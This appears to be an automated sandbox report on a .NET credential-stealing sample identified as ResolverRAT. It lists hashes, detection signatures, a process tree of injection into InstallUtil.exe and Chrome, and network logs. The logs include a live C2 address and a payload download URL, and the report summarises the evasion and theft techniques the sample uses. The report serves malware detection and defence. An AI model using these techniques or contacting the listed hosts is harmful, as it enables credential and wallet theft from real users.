Edit tour

Windows Analysis Report
BSN100357-HHGBM100002525.exe

Overview

General Information

Sample name:	BSN100357-HHGBM100002525.exe
Analysis ID:	1718460
Has dependencies:	false
MD5:	6ff95e302e8374e4e1023fbec625f44b
SHA1:	db4d7c6cf59c9c099ff7a61d93b1ec2efcb6e76d
SHA256:	d66850b3496bee853a294db28f3e6ed378c2e2340ea01b745d091e78ac41cb26
Tags:	exeuser-wuden
Infos:

Detection

ResolverRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected ResolverRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Creates a thread in another existing process (thread injection)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses threadpools to delay analysis

Classification

Process Tree

System is w10x64

BSN100357-HHGBM100002525.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe" MD5: 6FF95E302E8374E4E1023FBEC625F44B)

InstallUtil.exe (PID: 7460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

chrome.exe (PID: 7592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2400 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144566293 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144219944 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x104,0x108,0x10c,0x100,0x84,0x7ff8eb2d4f38,0x7ff8eb2d4f44,0x7ff8eb2d4f50 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144577987 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3856 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144610676 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=149773176 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=165262386 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

AI Summary

Source: Malware

## Malware Analysis Summary

The sample BSN100357-HHGBM100002525.exe is a .NET-based information stealer identified as ResolverRAT that employs process injection and browser manipulation techniques for credential harvesting.

### Initial Access
The malware executes as BSN100357-HHGBM100002525.exe (PID 6716) from the user's Desktop directory, initiating the infection chain.

### Evasion Techniques
The malware implements multiple anti-analysis measures:
- Sandbox detection by checking for SBIEDLL.DLL and other dynamic analysis indicators
- Anti-VM techniques to evade virtualized analysis environments
- Uses the legitimate InstallUtil.exe process as a host for malicious activities to appear benign

### Payload Execution and Staging
BSN100357-HHGBM100002525.exe spawns InstallUtil.exe (PID 7460) and injects malicious PE files into it. The injected InstallUtil.exe process then performs thread injection into multiple Chrome browser processes, creating a complex execution chain that obscures the malware's activities. The malware contains large array initializations and unpacker functionality, suggesting it dynamically loads additional components at runtime.

### Data Theft
The injected InstallUtil.exe process conducts extensive credential harvesting:
- Browser data theft targeting Chrome cookies, login credentials, and web data
- Bitcoin wallet information extraction from registry keys
- Putty/WinSCP session and password harvesting
- Microsoft Outlook mail credential theft through registry access

### Network Activity
InstallUtil.exe establishes TCP communication with the command and control server at 91.92.120.101:65535, indicating active data exfiltration or remote control capabilities.

### Process Relationships
The execution flow follows: BSN100357-HHGBM100002525.exe  InstallUtil.exe (injected)  Chrome processes (thread injection). The malware launches Chrome with specific parameters including a custom user data directory and disabled security features to facilitate data extraction.

### MITRE ATT&CK TTPs
- T1055 - Process Injection (PE injection into InstallUtil.exe and thread injection into Chrome)
- T1055.002 - Portable Executable Injection
- T1555.003 - Credentials from Web Browsers
- T1539 - Steal Web Session Cookies
- T1012 - Query Registry (credential harvesting)
- T1071.001 - Application Layer Protocol: Web Protocols (C2 communication)
- T1497 - Virtualization/Sandbox Evasion

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1392074556.0000000006AE0000.00000004.08000000.00040000.00000008.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1388786989.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716	JoeSecurity_ResolverRAT	Yara detected ResolverRAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.BSN100357-HHGBM100002525.exe.6ae0000.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.BSN100357-HHGBM100002525.exe.6ae0000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.BSN100357-HHGBM100002525.exe.3c694b0.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 91.92.120.101, DestinationIsIpv6: false, DestinationPort: 65535, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49692

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, SourceProcessId: 7460, StartAddress: 4C00AE, TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe, TargetProcessId: 8188

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: BSN100357-HHGBM100002525.exe	Virustotal: Detection: 38%			Perma Link
Source: BSN100357-HHGBM100002525.exe	ReversingLabs: Detection: 30%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.9%

Source: BSN100357-HHGBM100002525.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.15.121.100:443 -> 192.168.2.6:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49715 version: TLS 1.2

Source: BSN100357-HHGBM100002525.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390243145.0000000005900000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390243145.0000000005900000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: protobuf-net.pdb source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\adobeYolo.css	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.6.1.4_0\browser\css\assistantPopup.css	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 4x nop then jmp 067EFE32h	0_2_067EFC30
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 4x nop then jmp 067EFE32h	0_2_067EFC27
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 4x nop then jmp 06C3F867h	0_2_06C3F7FD
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 4x nop then jmp 06C3F867h	0_2_06C3FBD9
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 4x nop then jmp 06C3F867h	0_2_06C3F808

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 99MB

Source: global traffic

TCP traffic: 192.168.2.6:49692 -> 91.92.120.101:65535

Source: global traffic

HTTP traffic detected: GET /wp-admin/js/Daupinslenj.pdf HTTP/1.1Host: www.vastkupan.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.15.121.100 185.15.121.100

Source: Joe Sandbox View

ASN Name: INETLTDTR INETLTDTR

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.131
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.131
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.131
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.131
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.120.101

Source: global traffic	HTTP traffic detected: GET /wp-admin/js/Daupinslenj.pdf HTTP/1.1Host: www.vastkupan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tlSuF3oHAXZy8GK&MD=YHsdUPEh HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CMHxygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1host: www.google.comsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activeuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1host: www.google.comx-client-data: CMHxygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AcpJF5ho5qiteKFlOs9oa2OJ5wVzn8EE7yew0YGDDHuvWChMYrZS4bCh0dkVxyA3d7kOiYDYNiJkNeWb1tzHXkpyUJzzBlbDFwd4gjnQ5xHGSJZLAPXPo1r4yItWjektITcTAMZSmuWaL_vnnTTF3x3QBb5BkCr-MJha2g/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_6_1_4.crx HTTP/1.1host: clients2.googleusercontent.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.citSWp3NP7U.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xL6HUJcSIDSbTUlNBOsamhv5RMA/cb=gapi.loaded_0 HTTP/1.1host: apis.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CMHxygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AcpJF5hs0RaqlioRST5VUdtZtuwf-dtJSfgqDkrwCkFWRrggle--sEu-T-tqm1TV9gMsnGlbs2Z2JiXXVNN-aAHshVgF5tQXk3Qd_r_UT3EI3EXBGNdI6NK17spagGg11xsAxlKa5clZJBI2OABMYJC6zInaqqGOBt_E/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_93_1_0.crx HTTP/1.1host: clients2.googleusercontent.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tlSuF3oHAXZy8GK&MD=YHsdUPEh HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: chrome.exe, 00000009.00000003.1452104931.0000610C01404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1451847628.0000610C01478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1451995424.0000610C01498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) 